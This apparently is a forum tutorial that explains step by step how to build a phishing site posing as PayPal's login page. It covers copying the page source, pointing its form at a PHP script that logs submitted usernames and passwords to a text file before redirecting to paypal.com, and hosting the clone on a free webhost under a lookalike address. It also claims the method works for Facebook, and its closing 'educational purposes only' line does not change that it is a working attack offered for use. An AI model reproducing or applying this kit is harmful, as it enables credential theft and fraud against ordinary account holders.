Q.What is Phishing?
A.Basically phishing is fooling someone into thinking that your website is infact another website. e.g "paypallogin.com" made to look like "paypal.com".
Ok lets get started on what we need.
a basic computer knowledge.
a free webhost account ,110mb or t35.com.
First things first you need a website to phish from, so lets choose the paypal login for example.
go to
www.paypal.com .
now, when you are at the website if using firefox go to "view>page source" or alternatively press ctrl+u.
for internet explorer use the page dropdown tab then view source.
copy all of the source code. (ctrl+a then ctrl+c)
now open notepad or a text editor if you're using a linux distro.
paste the source code into the notepad file (ctrl+v).
save this file and call it "index.html".
open a new notepad file and enter this code
Code:
<?php
header ('Location:
http://paypal.com ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
change the passwords.txt to anything you wish .txt just make shure its not passwords.txt or you can be fucked over by someone who knows how to phish.
after you have done that, save this file as post.php.
now you have done that go back to your index.html file (open it with notepad not a web browser)
press ctrl+f and type in "form action" after doing so you should see "form action="randomlink" ect.." change the random link to "post.php" then save this file again under the same name.
ok we're nearlly done.
now if you made a free hosting account, login with it if not see the first steps.
you should come to a standard html ftp interface and you should see an option called "upload" click this button.
select the files we have just made "post.php" and "index.html" and upload them.
now your site should be complete you can access them by using your login name to your freehost so for example
"paypallogin.t35.com"
or "paypalidiotsgohere.110mb.com"
to test your site just randomly login to your phisher and then go back to your freehost account and you should see a new .txt file. this will contain the user name and password of the people who login to your phisher and the rest is down to yourself!
Note: ALSO WORKS FOR FACEBOOk
.
i do not advertise that you should phish this is merely for educational purposes only.